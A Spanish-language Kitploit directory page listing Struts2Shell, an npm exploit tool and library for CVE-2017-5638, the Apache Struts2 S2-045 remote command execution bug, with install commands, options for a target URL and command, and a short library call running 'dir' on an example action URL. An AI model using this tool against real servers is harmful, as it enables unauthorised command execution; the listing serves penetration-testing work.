Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Struts2Shell — Un exploit (y biblioteca) para CVE-2017-5638 - el bug Apache Struts2 S2-045. | Kitploit
Herramientas/GitHubGitHub/jpacora/struts2shell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubjpacora/struts2shell

Struts2Shell

Un exploit (y biblioteca) para CVE-2017-5638 - el bug Apache Struts2 S2-045.

Ver Repositorio
11hace 9 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Struts2Shell

Un exploit (y biblioteca) para CVE-2017-5638 - el bug S2-045 de Apache Struts2.

Instalación

root@kitploit:~
$ npm install -g struts2shell

Instalación como Biblioteca

root@kitploit:~
$ npm install struts2shell

Opciones de Línea de Comandos

root@kitploit:~
-h, --help           muestra información de uso
-V, --version        muestra el número de versión
-u, --url [target]   URL a Atacar
-c, --cmd [command]  Comando a Ejecutar

Uso como Biblioteca

root@kitploit:~
var Struts2Shell = require('struts2shell');
Struts2Shell({
	URL: 'http://example.com/some.action',
	CMD: 'dir'
}, function(err, response,body) {
    if(err) throw err;
    console.log(body)
})

Captura de Pantalla

Struts2Shell

Licencia

MIT

¡Software Libre, Claro Que Sí!

Descargar herramienta